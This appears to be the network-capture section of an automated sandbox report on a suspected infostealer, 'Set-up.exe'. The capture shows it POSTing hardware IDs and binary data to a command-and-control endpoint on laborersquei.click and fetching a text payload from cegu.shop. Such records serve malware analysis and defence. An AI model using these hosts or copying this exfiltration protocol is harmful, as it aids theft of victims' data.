                                                                                                                                                Data Ascii: 1QalYpLjBloVdAktBKQQZr4f0t5HaeS3LXVZIcVvgYbUBgTUl+aTv0Xh/Gtl8GWDuhqi7kYJ4KPIIG31JR+0ozEyQVWxMATqtMVNHxd3ghYv/nM6MG4HojiBeeelH/W3Vecg5cdX5KrFFc0PEJCEBsr7J8gTXTSDyIRf1WQuRXMlB8VhBtZiunS0HS+U4KB3LoqnLkNp4Vco4NzFFd7hQzHjxWA2MnK7ABCYy4CVRAMK+tMqk53UMxnRXaX0TqH


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49706 | 188.114.96.3 | 443 | 2164 | C:\Users\user\Desktop\Set-up.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 17:13:12 UTC | 274 | OUT | POST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: multipart/form-data; boundary=35EJJUQY
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 12773
                                                                                                                                                Host: laborersquei.click
                                                                                                                                                2024-12-30 17:13:12 UTC12773OUTData Raw: 2d 2d 33 35 45 4a 4a 55 51 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 42 34 41 46 46 39 33 46 43 44 34 30 43 42 36 33 44 31 34 39 41 31 30 42 34 46 35 30 30 33 0d 0a 2d 2d 33 35 45 4a 4a 55 51 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 35 45 4a 4a 55 51 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e 4f 0d 0a 2d 2d 33 35 45 4a 4a 55 51 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f
                                                                                                                                                Data Ascii: --35EJJUQYContent-Disposition: form-data; name="hwid"77B4AFF93FCD40CB63D149A10B4F5003--35EJJUQYContent-Disposition: form-data; name="pid"2--35EJJUQYContent-Disposition: form-data; name="lid"hRjzG3--DNO--35EJJUQYContent-Dispositio
2024-12-30 17:13:12 UTC | 1136 | IN | HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:13:12 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=e1pehgsceutklied4amf1rqbv1; expires=Fri, 25 Apr 2025 10:59:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=chk7k4onUqvj7vkAeurK%2B8pVeNTNHhb8Q1tttU7MdymVVnGu29T9kLwt1bNb%2FW340jMOqoImpVYAjFMORq7cj8eo%2FbToNm%2Bjif65I4%2FnShCxGhnRj%2BuKH3TkJbexpXRoJ2iOQxg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3a8baec900f4f-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1535&min_rtt=1528&rtt_var=587&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2846&recv_bytes=13705&delivery_rate=1843434&cwnd=239&unsent_bytes=0&cid=9ce9e61eb561aee9&ts=536&x=0"
2024-12-30 17:13:12 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-30 17:13:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | 2164 | C:\Users\user\Desktop\Set-up.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 17:13:13 UTC | 285 | OUT | POST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: multipart/form-data; boundary=LZ75PTAWC83KN3CTYS5
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 15081
                                                                                                                                                Host: laborersquei.click
                                                                                                                                                2024-12-30 17:13:13 UTC15081OUTData Raw: 2d 2d 4c 5a 37 35 50 54 41 57 43 38 33 4b 4e 33 43 54 59 53 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 42 34 41 46 46 39 33 46 43 44 34 30 43 42 36 33 44 31 34 39 41 31 30 42 34 46 35 30 30 33 0d 0a 2d 2d 4c 5a 37 35 50 54 41 57 43 38 33 4b 4e 33 43 54 59 53 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 5a 37 35 50 54 41 57 43 38 33 4b 4e 33 43 54 59 53 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e
                                                                                                                                                Data Ascii: --LZ75PTAWC83KN3CTYS5Content-Disposition: form-data; name="hwid"77B4AFF93FCD40CB63D149A10B4F5003--LZ75PTAWC83KN3CTYS5Content-Disposition: form-data; name="pid"2--LZ75PTAWC83KN3CTYS5Content-Disposition: form-data; name="lid"hRjzG3--DN
2024-12-30 17:13:13 UTC | 1131 | IN | HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:13:13 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=p3ivq7um2t4q4o2crenie5s94v; expires=Fri, 25 Apr 2025 10:59:52 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JYp6btusSaRm%2BHVqFQ9hrmkWHV4XLEe5C8s6UXzWd2bK5iYu268psxMRqtN1COdjqbHre5S562iHNvBJ%2BDCTqeB2LBLX0mFzYt5DcEgM5XH8RWTn7a5XH4h%2B87waX7aCevrdBb8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3a8c1ecbef793-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1958&min_rtt=1590&rtt_var=1333&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16024&delivery_rate=643313&cwnd=152&unsent_bytes=0&cid=bdc2f6b2f7da77cb&ts=545&x=0"
2024-12-30 17:13:13 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-30 17:13:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49708 | 188.114.96.3 | 443 | 2164 | C:\Users\user\Desktop\Set-up.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 17:13:14 UTC | 285 | OUT | POST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: multipart/form-data; boundary=WP6GKXANLN3P9BWPPON
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 20571
                                                                                                                                                Host: laborersquei.click
                                                                                                                                                2024-12-30 17:13:14 UTC15331OUTData Raw: 2d 2d 57 50 36 47 4b 58 41 4e 4c 4e 33 50 39 42 57 50 50 4f 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 42 34 41 46 46 39 33 46 43 44 34 30 43 42 36 33 44 31 34 39 41 31 30 42 34 46 35 30 30 33 0d 0a 2d 2d 57 50 36 47 4b 58 41 4e 4c 4e 33 50 39 42 57 50 50 4f 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 57 50 36 47 4b 58 41 4e 4c 4e 33 50 39 42 57 50 50 4f 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e
                                                                                                                                                Data Ascii: --WP6GKXANLN3P9BWPPONContent-Disposition: form-data; name="hwid"77B4AFF93FCD40CB63D149A10B4F5003--WP6GKXANLN3P9BWPPONContent-Disposition: form-data; name="pid"3--WP6GKXANLN3P9BWPPONContent-Disposition: form-data; name="lid"hRjzG3--DN
                                                                                                                                                2024-12-30 17:13:14 UTC5240OUTData Raw: 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii: 56vMMZh'F3Wun 4F([:7s~X`nO
2024-12-30 17:13:15 UTC | 1139 | IN | HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:13:15 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=c4jb5dq7u0dsko1ekcqs0k31t2; expires=Fri, 25 Apr 2025 10:59:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uuG3DWW6tuWuvoAWXW3KM0%2BuzlQP%2FW7bLZe7dAh%2B7eAV2NwUt%2FeROJvg1AznsdRwk99xeHB3HC13t%2BSWNiM6bgRfihbNqA2UXVrsxQjuGjl%2FThZSkzYgmlUZ%2BTRTPt0AsiPFcVo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3a8c9bf534408-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1592&rtt_var=607&sent=10&recv=27&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21536&delivery_rate=1785932&cwnd=201&unsent_bytes=0&cid=3bb182a3ea851f02&ts=945&x=0"
2024-12-30 17:13:15 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-30 17:13:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49709 | 188.114.96.3 | 443 | 2164 | C:\Users\user\Desktop\Set-up.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 17:13:16 UTC | 279 | OUT | POST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: multipart/form-data; boundary=72U8ILPE5UCMOV
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 1243
                                                                                                                                                Host: laborersquei.click
                                                                                                                                                2024-12-30 17:13:16 UTC1243OUTData Raw: 2d 2d 37 32 55 38 49 4c 50 45 35 55 43 4d 4f 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 42 34 41 46 46 39 33 46 43 44 34 30 43 42 36 33 44 31 34 39 41 31 30 42 34 46 35 30 30 33 0d 0a 2d 2d 37 32 55 38 49 4c 50 45 35 55 43 4d 4f 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 32 55 38 49 4c 50 45 35 55 43 4d 4f 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e 4f 0d 0a 2d 2d 37 32 55 38 49 4c 50 45 35 55
                                                                                                                                                Data Ascii: --72U8ILPE5UCMOVContent-Disposition: form-data; name="hwid"77B4AFF93FCD40CB63D149A10B4F5003--72U8ILPE5UCMOVContent-Disposition: form-data; name="pid"1--72U8ILPE5UCMOVContent-Disposition: form-data; name="lid"hRjzG3--DNO--72U8ILPE5U
2024-12-30 17:13:16 UTC | 1126 | IN | HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:13:16 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=8t72rb7c7v7ghr2ogknsjjv25d; expires=Fri, 25 Apr 2025 10:59:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hDlqzaMtauvi0apKfiY%2F3tZSb9YMP7tuFZCJsyIsrxgzIFgR4BEN5zZmJ9t9oG57JONWGxoVMyV092LkssIkh2IEejk2MqrKF5dTcxPuZkIojFOkP7UCWmQrbHbrhjF9O%2FCOsQw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3a8d4bdd443c2-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2110&min_rtt=2055&rtt_var=882&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2158&delivery_rate=1168000&cwnd=162&unsent_bytes=0&cid=591a11843991390a&ts=464&x=0"
2024-12-30 17:13:16 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-30 17:13:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49712 | 188.114.96.3 | 443 | 2164 | C:\Users\user\Desktop\Set-up.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 17:13:17 UTC | 276 | OUT | POST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: multipart/form-data; boundary=5MC82W35TAR
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 1057
                                                                                                                                                Host: laborersquei.click
                                                                                                                                                2024-12-30 17:13:17 UTC1057OUTData Raw: 2d 2d 35 4d 43 38 32 57 33 35 54 41 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 42 34 41 46 46 39 33 46 43 44 34 30 43 42 36 33 44 31 34 39 41 31 30 42 34 46 35 30 30 33 0d 0a 2d 2d 35 4d 43 38 32 57 33 35 54 41 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 4d 43 38 32 57 33 35 54 41 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e 4f 0d 0a 2d 2d 35 4d 43 38 32 57 33 35 54 41 52 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                Data Ascii: --5MC82W35TARContent-Disposition: form-data; name="hwid"77B4AFF93FCD40CB63D149A10B4F5003--5MC82W35TARContent-Disposition: form-data; name="pid"1--5MC82W35TARContent-Disposition: form-data; name="lid"hRjzG3--DNO--5MC82W35TARConten
2024-12-30 17:13:17 UTC | 1130 | IN | HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:13:17 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=q2977td4ido64ni13gcou6fber; expires=Fri, 25 Apr 2025 10:59:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bXBktrroh397aLwKJWe%2FnxAiX5tatWCg3tNIcIUYfelujffvMb1rjHTqZYn3nmDb5ADZS7bz3Yi89ENF86HO4VzkcmfDjS%2F07dl1SoewoxdcMRzk%2BOqvxTRbYqzFyGNlkr%2BQ6mI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3a8db7a717c93-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1974&min_rtt=1968&rtt_var=750&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1969&delivery_rate=1448412&cwnd=210&unsent_bytes=0&cid=c092020a02cc02c4&ts=535&x=0"
2024-12-30 17:13:17 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-30 17:13:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49715 | 188.114.96.3 | 443 | 2164 | C:\Users\user\Desktop\Set-up.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 17:13:18 UTC | 267 | OUT | POST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 112
                                                                                                                                                Host: laborersquei.click
                                                                                                                                                2024-12-30 17:13:18 UTC112OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 44 4e 4f 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 26 68 77 69 64 3d 37 37 42 34 41 46 46 39 33 46 43 44 34 30 43 42 36 33 44 31 34 39 41 31 30 42 34 46 35 30 30 33
                                                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--DNO&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=77B4AFF93FCD40CB63D149A10B4F5003
2024-12-30 17:13:18 UTC | 1128 | IN | HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:13:18 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=n7eb0eodiq0v1lk9stjbru6ok5; expires=Fri, 25 Apr 2025 10:59:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=etK2H6a%2B3bFGM8zu3x4BATuHBUETerfU8FIu5pLvb4Sve9ioUKvyIX4e1WJjqroJOC5B033fWOA%2Fjq4ObBXQiJ7oEJmOJPU9dqli6w141eO1%2BhNx74td8ow94ABjVzinXXU31Rs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3a8e1fb8b7ce7-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1908&min_rtt=1897&rtt_var=734&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1015&delivery_rate=1469552&cwnd=199&unsent_bytes=0&cid=77e271675685f5ec&ts=458&x=0"
                                                                                                                                                2024-12-30 17:13:18 UTC218INData Raw: 64 34 0d 0a 54 45 30 77 48 71 37 67 74 48 39 61 59 59 4f 50 67 79 4e 62 43 66 70 37 4e 4e 4d 77 52 6e 50 61 63 64 54 77 71 4f 2f 38 41 47 67 58 4e 68 4a 72 6a 4e 71 57 46 79 34 56 38 2f 79 35 66 33 52 56 31 52 68 52 74 45 56 6f 41 4c 49 65 70 4b 79 48 31 38 6b 33 58 48 35 37 41 69 71 61 31 75 68 51 4b 67 6d 74 2b 2f 74 58 65 53 58 59 48 55 44 78 43 6e 52 66 2b 42 54 32 79 70 6d 53 30 48 74 4b 4f 57 38 4b 50 4d 61 55 77 41 38 70 57 39 2b 67 33 77 77 77 5a 5a 4d 4c 51 71 5a 64 4c 77 43 76 47 50 71 44 77 49 43 4d 58 45 63 6c 49 30 52 42 7a 59 7a 45 49 43 6b 4a 34 71 48 33 57 79 38 72 31 6c 6c 53 70 78 4a 38 51 2f 5a 54 73 64 4b 53 33 34 46 64 0d 0a
                                                                                                                                                Data Ascii: d4TE0wHq7gtH9aYYOPgyNbCfp7NNMwRnPacdTwqO/8AGgXNhJrjNqWFy4V8/y5f3RV1RhRtEVoALIepKyH18k3XH57Aiqa1uhQKgmt+/tXeSXYHUDxCnRf+BT2ypmS0HtKOW8KPMaUwA8pW9+g3wwwZZMLQqZdLwCvGPqDwICMXEclI0RBzYzEICkJ4qH3Wy8r1llSpxJ8Q/ZTsdKS34Fd
2024-12-30 17:13:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49718 | 185.161.251.21 | 443 | 2164 | C:\Users\user\Desktop\Set-up.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 17:13:19 UTC | 201 | OUT | GET /8574262446/ph.txt HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Host: cegu.shop
2024-12-30 17:13:19 UTC | 249 | IN | HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.26.2
                                                                                                                                                Date: Mon, 30 Dec 2024 17:13:19 GMT
                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                Content-Length: 329
                                                                                                                                                Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                                                Connection: close
                                                                                                                                                ETag: "676c9e2a-149"
                                                                                                                                                Accept-Ranges: bytes
